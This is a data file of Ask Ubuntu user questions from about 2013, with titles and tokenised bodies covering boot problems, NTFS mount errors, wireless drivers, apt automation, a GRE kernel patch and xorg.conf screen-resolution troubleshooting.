339688	run .jar as application	i 've noticed that when running a .jar file the unity launcher can be quite annoying . if the jar file is run in a terminal then the launcher icon is the one set in the application , as expected . however if it is run from nautilus with a double click or open with ... > openjdk then the title in the launcher is open jdk and the icon is always the default icon . i think this is because java is opening the file rather than running it straight off ( if that makes sense ) . is there any way to have the application 's icon rather than the default if running it from nautilus , without making a .sh file or something similar to call it ? ps : i do n't want it permanently in the launcher , therefore i do n't want to create a .desktop file for it . i want it like any other application which when run appears in the launcher .
339695	ubuntu is installed but not booting.i am using a windows 8 pre-installed laptop	ubuntu is installed but not booting and is appearing in os choice but when i choose ubuntu it shows can not find file ubuntu/winboot/wubildr.mbr i am using a windows 8 pre-installed laptop . i installed it using livedvd but i am not able to boot . do i need to change bios settings ?
339697	are there alternatives to software center ?	are there any gui alternatives to the ubuntu software center with fast application loading/low startup time fast search low weight/size application purchase facility
339702	network service discovery disabled : what does this mean for me ?	every time at boot i get a message ânetwork service discovery disabled . your current network has a .local domain , which is not recommended and incompatible with the avahi network service discovery . the service has been disabled.â what does this mean for me ? wi-fi is disabled .
339703	only some programs make sounds !	why are spotify and chromium totally silent when playing music ? media player and firefox works great . i can see in `` sound settings '' that the applications produce sounds and their volume sliders are turned up but they just wo n't make any sounds . thankful for any help .
339708	unable to mount windows partition after resize	so what happened is i was creating a partition on my hdd ( main one , no external ones ) that could be accessed from both windows and ubuntu , one i could store files i would use on both in . i had empty space on the windows partition so i shrunk that to the minimum and then created a partition with what was empty . that went off without a hitch . now , when i try to mount my windows partition , this is what i get : error mounting /dev/sda1 at /media/ubuntu/toshiba satellite a105 s4304 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/ sda1 '' `` /media/ubuntu/toshiba satellite a105 s4304 '' ' exited with non-zero exit status 13 : failed to load runlist for $ mft/ $ data . highest_vcn = 0x7894 , last_vcn - 1 = 0x78ef failed to load $ mft : input/output error failed to mount '/dev/sda1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . i looked around and found i should try running this command : sudo ntfsfix /dev/sda1 but i got this : mounting volume ... failed to load runlist for $ mft/ $ data . highest_vcn = 0x7894 , last_vcn - 1 = 0x78ef failed to load $ mft : input/output error failed attempting to correct errors ... failed to load runlist for $ mft/ $ data . highest_vcn = 0x7894 , last_vcn - 1 = 0x78ef failed to load $ mft : input/output error failed failed to startup volume : input/output error checking for self-located mft segment ... ok failed to load runlist for $ mft/ $ data . highest_vcn = 0x7894 , last_vcn - 1 = 0x78ef failed to load $ mft : input/output error volume is corrupt . you should run chkdsk . edit : 9/2/2013 adding sudo fdisk -l info : disk /dev/sda : 100.0 gb , 100030242816 bytes 255 heads , 63 sectors/track , 12161 cylinders , total 195371568 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x5f425f42 device boot start end blocks id system /dev/sda1 * 63 54028287 27014112+ 7 hpfs/ntfs/exfat /dev/sda2 54028288 117415935 31693824 7 hpfs/ntfs/exfat /dev/sda3 117417982 195371007 38976513 5 extended /dev/sda5 193296384 195371007 1037312 82 linux swap / solaris /dev/sda6 117417984 193296383 37939200 83 linux partition table entries are not in disk order what should i do ? i do n't want to shut down in case it will cause problems . i know that moving partitions can cause problems ( accidently deleted grub once by simply re-formatting the ubuntu partition ... oops : p ) , but i did n't think this would . i have the windows xp disk somewhere , but i 'm not totally sure where , i could try and find it . should i use rescatux ? help !
339713	how to connect to this wifi	i 'm currently using ubuntu 12.04.3 ... i have a broadcom 4313 wireless card ... i have installed the proprietary driver from additional drivers application . i 'm able to connect to wifi in my home . but , in my college they have some firewall and need to configure their settings ... the details are in the intranet . so , i have attached it in google docs . https : //docs.google.com/document/d/1-mvaix1fkv5zwjkucbjp2lpfn_az9dun_laeiqjwzkq/pub i even tried changing some settings . but , i 'm unable to connect . ( i have n't edited any code in ubuntu ) . can you please help me to configure my laptop to connect to wifi in my college ? ? thanks in advance : )
339720	how to make a .deb package that would add link to a repo to software sources ?	i do not need .dsc , .tar.gz , .changes etc . and i can make a .deb package with this command dpkg -b path/to/repo . i just want to know how to make a .deb that would link a repository to `` software sources '' like google chrome ? i also want to know if i can host the package in dropbox .
339721	how to compare two images using sift in linux and matlab	i need to compare two images . the main purpose is logo identification . i tried to use sift . but i do not understand how to mark key points and comparing . i am using linux . i am trying to use siftdemov4 . can anyone help in using it in linux command-line step by step . i need to compare two jpg images .
339723	can i sell my pyqt4-app without having a pyqt license ?	i would like to sell a python application that uses pyqt4 . the commercial licenses for qt pyqt cost thousands of euros together . do i need to buy a commercial license ? consider this from a `` packaged '' point of view where i 'm providing an ubuntu package through the software center . my package would `` depend '' on existing ubuntu python and pyqt packages so would i need to license something that ubuntu is redistributing , that i am not directly ? conversely , if i did include a gpl/lgpl python library in my package would my package be able to remain non-free ? could n't i just make the source to the gpl libraries available ( if modified ) ? if the answer is `` you need a commercial license '' , are there any cheaper alternatives you know of ( like royalty-based payments instead of up-front developer fees ) ?
339724	atheros qca9565 / ar9565 wireless card does n't work after updating	today i bought my first laptop with ubuntu installed . everything was working until i decided to make the update . i used the update manager , installed all the update , but then my wireless stop working . i went to the dell site , make the account , but some tools work only with ie ( and they suggest to install it ! ! ca n't believe ... ) and when i select my laptop model to download the drivers the answer is 0 result ... ca n't believe also ! i check on internet about a solution but i did n't find . can someone help me ? if i make a lshw this is what i think is the wireless info : *-network unclaimed description : network controller product : qca9565 / ar9565 wireless network adapter vendor : qualcomm atheros
339725	problem on installing ubuntu 13.04 using vm virtualbox manager after clicking restart/windows 8 intel i7	here is my problem : trying to install ubuntu 13.04 to use it as vm on windows 8 intel i7 ( not sure if that makes any difference ) . i use the most recent version of oracle vm virtualbox manager . downloaded a file from this website : http : //releases.ubuntu.com/13.04/ clicked on : pc ( intel x86 ) desktop image the file name is : ubuntu-13.04-desktop-i386 after install it gets to restart button and when i click nothing happens . just a black screen and all i see a few menu options at the top right machine , view , devices , and help . tried installing many times and all of them do not get me anywhere , same issue everytime i reinstall . did someone have same issue installing ubuntu 13.04 ?
339727	how can i install windows 7 over ubuntu ?	i 've enjoyed using ubuntu 13.04 but i 'd like to install windows 7 over ubuntu so i have a fresh install of windows 7 thats use all of my hdd , i 'm not new to ubuntu i 've been using it for a few months but i ca n't seem to find this and i 've tried unetbootin and gparted and other applications but it never seemed to workout , anyways i have windows 7 on an iso and i 'd like to put it on an usb and install from there but apparently it 's not as simple as it seems .
339740	firefox already running issue	firefox 23.0 canonical 1.0 already running not shutting down or starting up error . states its already running need to shut-down do system restart and close browser .
339743	how to find program commands & hardsubs on `` hand brake ''	i 'm a newbie on ubuntu bare with me plz . been using ubuntu for a few weeks now everything is working fine and im getting better and more familliar as i go but in the past i have been able to guess and with luck find the correct program command line but today with the installation of handbrake i found out this method is not very reliable ( command line was `` ghb '' noway i could have guessed that ) is there a way for me to find out program launcher command lines the easy way without first doing a google search or guessing . second question : is there any way for me to hardsub/ '' burned in '' subs from . mkv files in handbrake ( .srt ) to .mp4 ( suitable for youtube ) or a simmmilar application that would do ( tried mkvgui/extractor )
339745	convert wordlist.txt file [ s ] , to make them compatible and working in goldendict	i 've got five wordlist.txt dictionary-files ; downloaded at dict.cc , and i need to convert them into .ifo | dict.dz | idx.gz or .index | .dict ( .dz ) -format , in order to make them work in/with goldendict . can someone please provide some insides , on how to go about it right ! also i would like to keep the formatting of those dictionaries clean , [ simple and structured as possible ] once they are converted .
339746	mp3 tag editing with an encrypted home directory	why can mp3 tag editors not access my encrypted home directory ? i 've tried easytag , puddletag , and mp3 diags ... it seems to be a permission issue , but banshee can play/edit my music files no problem . ls -ld / /home $ home drwxr-xr-x 25 root root 4096 aug 22 12:23 / drwxr-x -- x 4 root root 4096 sep 12 2012 /home drwxr-x -- x 102 matt matt 36864 sep 1 11:47 /home/matt and script some.log easytag exit shows : script started on mon 02 sep 2013 16:14:58 edt ] 0 ; matt @ latitude : ~matt @ latitude : ~ $ easytag ] 0 ; matt @ latitude : ~matt @ latitude : ~ $ exit exit script done on mon 02 sep 2013 16:15:33 edt
339749	where is rhythmbox when i close the window ?	i use rhythmbox to play songs , but when i clicked the top-right close x , it disappeared , but the song is still playing . where can i find it ? ps . i use lubuntu
339754	wireless hard blocked on lenovo s205	okay so im really frustrated ... for like the last couple of months i was running the early release of 12.04 , but then i had to clear my hard drive and finally upgraded to the actual release of 12.04 . now , my wireless wo n't work . with rfkill list , it shows that my wireless lan is hard blocked but not soft blocked . i 've tried everything , the hardware switch is on , rfkill unblock all wo n't do anything and there is nothing in my bios restricting wifi , and , to make it even more confusing , if i just boot from a usb , wireless works fine . for some reason it just wo n't work if it is installed . any help would be appreciated
339755	envy 4500 printer not scanning	i have an hp envy 4500 e-all-in-one printer . it installed & prints successfully . but the printer function does not work . simple scan says no scanner detected . i ran command sudo sane-find-scanner & the scaner was nalso not detected . i tied upgrading my hplip driver to the latest version , but it fails with an error that gcc is ot installed . but i know for a fact gcc is installed . any help would be appreciated .
339758	netbeans and java crash within minutes	at the moment whenever i start netbeans it runs for a few minutes and then becomes unresponsive . eventually i have found the only thing i can do is open the system monitor find java and kill it . obviously this is not optimal for working as all work is lost each time this is done . googling the issue suggests that install sun java 6 is the answer but this came to the end of it 's life cycle and has known security flaws so i would rather not take the risk just to get a single program running . i am running ubuntu on a 64bit amd processor . other details : netbeans 7.1.2 java 1.6.0_27 ; openjdk 64-bit server vm 20.0-b12
339760	why do i keep getting 'failed to download ' error whenever i try to download anything from the terminal ?	w : failed to fetch http : //ppa.launchpad.net/ferramroberto/java/ubuntu/dists/raring/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ferramroberto/java/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i keep getting this when i download anything from the terminal . how do i get around this ?
339761	x does not start after removing parameters quiet splash	i would like to remove the splash screen . kubuntu 12.04 runs on my laptop with kde 4.11 ( i use the backports offered by the kubuntu community ) . in order to remove the splash at boot time , i removed the kernel parameters quiet splash in /etc/default/grub and did execute update-grub . however , the result of this is that x does not start correctly anymore . i end up at the console login prompt . i can login and execute startx , which brings me to the kde desktop . of course , this behaviour was not intended by me . how can i solve this issue ? edit : i reverted the grub config file , i.e . added the parameters quiet splash again , which results in a correct boot ( without boot messages ) .
339763	ca n't remove the icon of a wine application from unity dash home	lately i installed folder lock 6 using wine on my ubuntu 12.04 , then i again uninstalled it but the folder lock icon was not removed from the dash home . i thought uninstalling wine would solve the problem but the icon is still on dash and cant be removed .
339764	how can i know what 's drivers i need to install ?	how can i know what is drivers are need to install for my hardware , and how can i check that all drivers work , especially the vga driver . i know that can go to additional drivers window can see the drivers but if i in tty ca n't do that or if i in any another distro or dde ca n't do that too so is there any command to do that to check if i need or do n't need to install another drivers and to check if all drivers working good or not ? ? ?
339765	how could i make the pcmanfm do n't display the windows system partition ?	i use the ubuntu and the windows system on my pc , when i open the file manage pcmanfm in lubuntu , the left side show me my windows partition , ie my c : d : partition in windows , but i do n't wo n't it display here , what should i do ? i have unchecked the edit- > preferences- > volume management all three auto-mount items , but it does n't work . ps.i use the pcmanfm 0.9.10
339766	qt 5.1.1 installation problem	i am new to ubuntu and using 12.04 lts . i tried to install qt5.1.1 without software manager . i downloaded the qt-linux-opensource-5.1.1-x86-offline.run file and ran it . it ran smoothly and got a installed in a folder . however when i try to navigate to the /home/qt5.1.1/tools/qtcreator/bin and execute the qtcreator executable from the terminal i get the error segmentation fault ( core dumped ) ..it will be really helpful if some one suggested how to correctly install qt5.1.1 and get rid of this error .
339769	what version of ubuntu to install on a lenovo ideapad yoga machine	hey , what version of ubuntu can i install on a lenovo ideapad yoga 11 '' machine ? and can i run it with windows installed on windows 8 rt garbage that is previously on this machine
339772	customize keyboard layout including navigation keys	i know how to customize the keyboard layout as explained here . it works with symbols and numbers , but how can i assign navigation keys ? what i want to do is to assign the arrows and other navigation keys to use them with alt gr : alt gr + s = left alt gr + d = down alt gr + f = right alt gr + e = up alt gr + t = prev page alt gr + v = next page alt gr + a = home alt gr + g = end alt gr + z = delete alt gr + q = escape alt gr + r = insert thank you
339786	problem during install lubuntu ( 13.04 ) on the old notebook ( legacy video and other problems )	i 'm trying to install lubuntu ( 13.04 ) on legacy notebook ( toshiba satellite 1405-s171 , video chip = supersavage ix/c sdr , 512mb ram , celeron ) from cd . shortly : gui install app does n't work because of video card problem . fortunately i can press ctrl + alt + f1 and jump to terminal session . how to continue setup from terminal ? if i would succeed to install lubuntu i could update video driver later , but now when my system is loaded from cd i do not understand what i could do else ... just to continue process from terminal.. details : boot menu and splash screen works fine but installer ( that one that contains wizard `` welcome/language list > choose timezone > choose name '' ) is corrupted : only half of the screen shows something recongnizable , mouse pointer is black square and left `` black trace '' , click does n't work etc , but keyboard works well so i am able to jump to terminal . lshw -c video and sudo lspci -k does n't show the video driver ! may be somebody could explain what does it mean ? i have made some experiments with boot string setting vga=xxx and some other boot string options . splash screen react on them very clearly , but installer in most cases ignores them . it seems installer loads another driver . how could i prevent do to it from boot string options ? is it possible to say `` use vesa '' ? of course : sudo apt-get install lubuntu-desktop does n't work as i need , but may be it is possible from terminal a ) mount to the notebook 's disk b ) install lubuntu to this disk and make this disk bootable ?
339788	why does memtest86+ restart immediately when i click start test ?	i have tried memtest86+ from different livecds but when i click on start ... .it reboots . my laptop has been kinda slow lately ... so i decided to test it and this is what happened . it is really weird . is there a way to find out what causes the problem ? or what went wrong on the hardware side of my laptop ? update : i individually tested the 2 memory sticks and it restarted in both of the cases . i highly doubt both memory sticks are corrupted . how can they both get corrupted at the same time . weird .
339790	how can i prevent apt-get/aptitude from showing dialogs during installation ?	i 'm trying to build an ansible playbook to deploy some ubuntu 12.04 servers on linode , but my problem seems to be an ubuntu one . when i run different combinations of apt-get or aptitude i always get the following dialog that i have to respond to . i 'd like this to be answered from the command line so that it does n't interrupt the automatic deployment . any ideas ? my current commands are below . note that i 'm trying to set debian_frontend : # ! /bin/bash echo 'debian_frontend= '' noninteractive '' ' > > /etc/profile echo 'debian_frontend= '' noninteractive '' ' > > ~/.profile source /etc/profile source ~/.profile # this next line is the one that pops up the dialog sudo aptitude -y install iptables-persistent # need this to fix an issue with the package post-install ( this works fine . ) sudo sed \ -i 's/\ ( modprobe -q ip6\ ? table_filter\ ) /\1 || true/g ' \ /var/lib/dpkg/info/iptables-persistent.postinst ; \ sudo aptitude install iptables-persistent
339796	how would i execute a .jar using terminal , permissions only does read and write , yet not execute	the file i am trying to execute is techniclauncher ( 1 ) .jar i have tried looking in the permissions ( as mentioned before ) but it does not show where it can be executed . i have also tried looking in preferences but same thing . i am running lubuntu with xfce . how will i execute it using the terminal ?
339800	encryption of the ubuntu install has made my os unworkable . can it easily be resolved ?	if , i 've not got any files saved as it 's brand new , how easy is it to just completely overwrite the install ? i 'm going to try tomorrow . almost gave in a re-installed windows but will try again . at the moment ubuntu is asking me for a password every time i do absolutely anything . it 's really annoying and i have to boot using an analogue keyboard before plugging in my usb wireless board to use after log-in . also , since grub took over during the install , i can no longer access the boot menu before ubuntu boots . will a re-install fix this ?
339804	ctrl+alt ! = altgr ( how to change/adjust key-shortcut , in order to make @ -sign )	i 'm using hungarian keyboard layout , but ca n't input e.g . @ using ctrl + alt +v , only with altgr . it stands for all the altgr characters . how can i make it to work with ctrl + alt + ? ?
339807	dual boot with windows 8.1 and ubuntu 13.04 , ubuntu is low on disk space . what can i do ?	right now , my available disk space on ubuntu is very low , and i want to increase it . my main drive has several partitions on it . i have a main partition for windows , a 900mb partition which i believe ubuntu is installed on , and a 13gb partition that contains /home for ubuntu . while running ubuntu , i got a message that i was low on disk space . i want to know what my options are . is it possible for windows and /home to share the same partition ? is there a better way to dual boot ubuntu ? thanks for the help
339810	auto mount server secondary hard disk shared folder to client	i was tried to mount server secondary hard disk shared folder to my client computer . already the secondary share folder was mound on server like this /media/sdc1/foldername/ i want to auto mount above share folder to my client computer when start . the following code was written on /etc/fstab //192.168.1.150/media/sdc1/httpserver /media/httpserver ntfs-3g defaults , locale=en_us.utf8 0 0 it 's does not work and it 's return the following error mount : only root can mount //192.168.1.150/media/sdc1/httpserver on /media/httpserver i was tried to share from ubuntu 12.04 server to ubuntu 13.04 client pc . i was installed samba file share server on server pc . it 's work fine for windows os share . but i need ubuntu auto-mount share . i was read so many article for this issues . but i did not get correct please tell anyone . thanks advance
339816	how do i apply this kernel patch to /net/ipv4/ip_gre.c ?	i 've been googling for a while about how to do patch linux kernel but still have no clue . my intention is to do a patch to /net/ipv4/ip_gre.c . the patch is from here http : //patchwork.ozlabs.org/patch/264994/ diff -- git a/net/ipv4/ip_gre.c b/net/ipv4/ip_gre.c index 855004f..c52fee0 100644 -- - a/net/ipv4/ip_gre.c +++ b/net/ipv4/ip_gre.c @ @ -572,7 +572,7 @ @ static int ipgre_header ( struct sk_buff *skb , struct net_device *dev , if ( daddr ) memcpy ( & iph- > daddr , daddr , 4 ) ; if ( iph- > daddr ) - return t- > hlen ; + return t- > hlen + sizeof ( *iph ) ; return - ( t- > hlen + sizeof ( *iph ) ) ; } doing patch command still no success . so i tried change the line just like decribed in the patch to the file i wanted to patch , delete the ( - ) and add ( + ) line . does the ip_gre.c file need to be compiled again ? ?
339817	screen resolution - ca n't get xorg.conf to use modeline instead of edid	having real problems getting ubuntu 13.04 running properly on a sony vaio vgc-js1e all in one desktop pc . i also have no sound , but this question is about screen resolution . the panel in the pc has a native resolution of 1680 x 1050 . i ca n't find any further information than that , including refresh rate . graphics are intel . on first install the screen defaults to a low resolution at top-left of the screen , the remainder being filled with repeats of the far-right and bottom pixel columns/rows . i can change the resolution to a higher one in ubuntu settings , but the native resolution does not appear in the list . also there 's a second panel detected even though i do n't have one connected . i understand this may be something to do with an hdmi output though , even though it 's not in use . i tried adding it with xrandr but the area outside the maximum resolution in the list ( 1600 x 1200 ) is hidden ( the mouse pointer disappears behind the repeating pixels ) . so i got to work looking on the forums to create an xorg.conf file with an appropriate modeline and various options to force x to only use one screen ( which works ) and to ignore the false edid information from the screen and use the modeline instead . everything i try , however , seems useless . having checked xorg.0.log , this section seems to apply ( it 's also repeated a few times ) : [ 1439.982 ] ( ii ) intel ( 0 ) : edid for output lvds1 [ 1439.982 ] ( ii ) intel ( 0 ) : not using mode `` 1680x1050_60 '' ( exceeds panel dimensions ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 320x240 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 400x300 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 400x300 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 512x384 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 640x480 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 640x512 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 800x600 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 896x672 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 928x696 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 960x720 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 576x432 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 680x384 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 680x384 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 700x525 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 720x450 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 800x512 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 840x525 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 840x525 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 960x540 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 960x600 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : not using default mode `` 1024x768 '' ( doublescan mode not supported ) [ 1439.982 ] ( ii ) intel ( 0 ) : printing probed modes for output lvds1 [ 1439.982 ] ( ii ) intel ( 0 ) : modeline `` 1600x1200 '' x60.0 162.00 1600 1664 1856 2160 1200 1201 1204 1250 -hsync -vsync ( 75.0 khz ep ) [ 1439.982 ] ( ii ) intel ( 0 ) : modeline `` 1600x1024 '' x60.2 103.12 1600 1600 1656 1664 1024 1024 1029 1030 +hsync +vsync ( 62.0 khz d ) [ 1439.982 ] ( ii ) intel ( 0 ) : modeline `` 1400x1050 '' x60.0 122.00 1400 1488 1640 1880 1050 1052 1064 1082 +hsync +vsync ( 64.9 khz d ) [ 1439.982 ] ( ii ) intel ( 0 ) : modeline `` 1280x1024 '' x60.0 108.00 1280 1328 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 64.0 khz d ) [ 1439.982 ] ( ii ) intel ( 0 ) : modeline `` 1440x900 '' x59.9 106.50 1440 1520 1672 1904 900 903 909 934 -hsync +vsync ( 55.9 khz d ) [ 1439.982 ] ( ii ) intel ( 0 ) : modeline `` 1280x960 '' x60.0 108.00 1280 1376 1488 1800 960 961 964 1000 +hsync +vsync ( 60.0 khz d ) [ 1439.982 ] ( ii ) intel ( 0 ) : modeline `` 1360x768 '' x59.8 84.75 1360 1432 1568 1776 768 771 781 798 -hsync +vsync ( 47.7 khz d ) [ 1439.982 ] ( ii ) intel ( 0 ) : modeline `` 1360x768 '' x60.0 72.00 1360 1408 1440 1520 768 771 781 790 +hsync -vsync ( 47.4 khz d ) [ 1439.982 ] ( ii ) intel ( 0 ) : modeline `` 1152x864 '' x60.0 81.62 1152 1216 1336 1520 864 865 868 895 -hsync +vsync ( 53.7 khz d ) [ 1439.982 ] ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz d ) [ 1439.982 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz d ) [ 1439.982 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync ( 35.2 khz d ) [ 1439.982 ] ( ii ) intel ( 0 ) : modeline `` 640x480 '' x59.9 25.18 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz d ) here 's my xorg.conf : section `` serverlayout '' identifier `` layout1 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' screen `` screen1 '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` glx '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` lvds1 '' horizsync 30-81 vertrefresh 56-75 option `` nousebios '' option `` preferredmode '' `` 1680x1050_60 '' modeline `` 1680x1050_60 '' 147.14 1680 1784 1968 2256 1050 1051 1054 1087 -hsync +vsync option `` dpms '' endsection section `` monitor '' identifier `` vga1 '' option `` ignore '' `` true '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` swcursor '' # [ < bool > ] # option `` kmsdev '' # < str > # option `` shadowfb '' # [ < bool > ] identifier `` card0 '' driver `` modesetting '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` swcursor '' # [ < bool > ] # option `` kmsdev '' # < str > # option `` shadowfb '' # [ < bool > ] identifier `` card1 '' driver `` modesetting '' busid `` pci:0:2:1 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` noaccel '' # [ < bool > ] # option `` accelmethod '' # < str > # option `` backlight '' # < str > # option `` dri '' # < str > # option `` colorkey '' # < i > # option `` videokey '' # < i > # option `` tiling '' # [ < bool > ] # option `` linearframebuffer '' # [ < bool > ] # option `` swapbufferswait '' # [ < bool > ] # option `` triplebuffer '' # [ < bool > ] # option `` xvpreferoverlay '' # [ < bool > ] # option `` hotplug '' # [ < bool > ] # option `` relaxedfencing '' # [ < bool > ] # option `` xvmc '' # [ < bool > ] # option `` zaphodheads '' # < str > # option `` tearfree '' # [ < bool > ] # option `` percrtcpixmaps '' # [ < bool > ] # option `` fallbackdebug '' # [ < bool > ] # option `` debugflushbatches '' # [ < bool > ] # option `` debugflushcaches '' # [ < bool > ] # option `` debugwait '' # [ < bool > ] # option `` buffercache '' # [ < bool > ] identifier `` card2 '' driver `` intel '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` noaccel '' # [ < bool > ] # option `` accelmethod '' # < str > # option `` backlight '' # < str > # option `` dri '' # < str > # option `` colorkey '' # < i > # option `` videokey '' # < i > # option `` tiling '' # [ < bool > ] # option `` linearframebuffer '' # [ < bool > ] # option `` swapbufferswait '' # [ < bool > ] # option `` triplebuffer '' # [ < bool > ] # option `` xvpreferoverlay '' # [ < bool > ] # option `` hotplug '' # [ < bool > ] # option `` relaxedfencing '' # [ < bool > ] # option `` xvmc '' # [ < bool > ] # option `` zaphodheads '' # < str > # option `` tearfree '' # [ < bool > ] # option `` percrtcpixmaps '' # [ < bool > ] # option `` fallbackdebug '' # [ < bool > ] # option `` debugflushbatches '' # [ < bool > ] # option `` debugflushcaches '' # [ < bool > ] # option `` debugwait '' # [ < bool > ] # option `` buffercache '' # [ < bool > ] identifier `` card3 '' driver `` intel '' busid `` pci:0:2:1 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` rotate '' # < str > # option `` fbdev '' # < str > # option `` debug '' # [ < bool > ] identifier `` card4 '' driver `` fbdev '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` defaultrefresh '' # [ < bool > ] # option `` modesetclearscreen '' # [ < bool > ] identifier `` card5 '' driver `` vesa '' busid `` pci:0:2:0 '' endsection section `` device '' identifier `` device1 '' driver `` intel '' # option `` dpms '' # option `` accelmethod '' `` uxa '' option `` monitor-lvds '' `` lvds1 '' option `` ignoreedid '' `` true '' option `` noddc '' `` true '' # option `` monitor-vga '' `` vga1 '' endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` lvds1 '' defaultdepth 24 option `` useedid '' `` false '' option `` useediddpi '' `` false '' option `` modedebug '' `` true '' option `` exactmodetimingsdvi '' `` true '' option `` modevalidation '' `` nowidthalignmentcheck , nodfpnativeresolutioncheck '' option `` twinview '' `` 0 '' subsection `` display '' depth 24 modes `` 1680x1050 '' endsubsection endsection also modified the following in /etc/default/grub , to no avail : grub_cmdline_linux_default= '' quiet splash acpi_osi= '' grub_cmdline_linux= '' video=lvds1:1680x1050 '' any advice would be very gratefully received ! thanks , andy
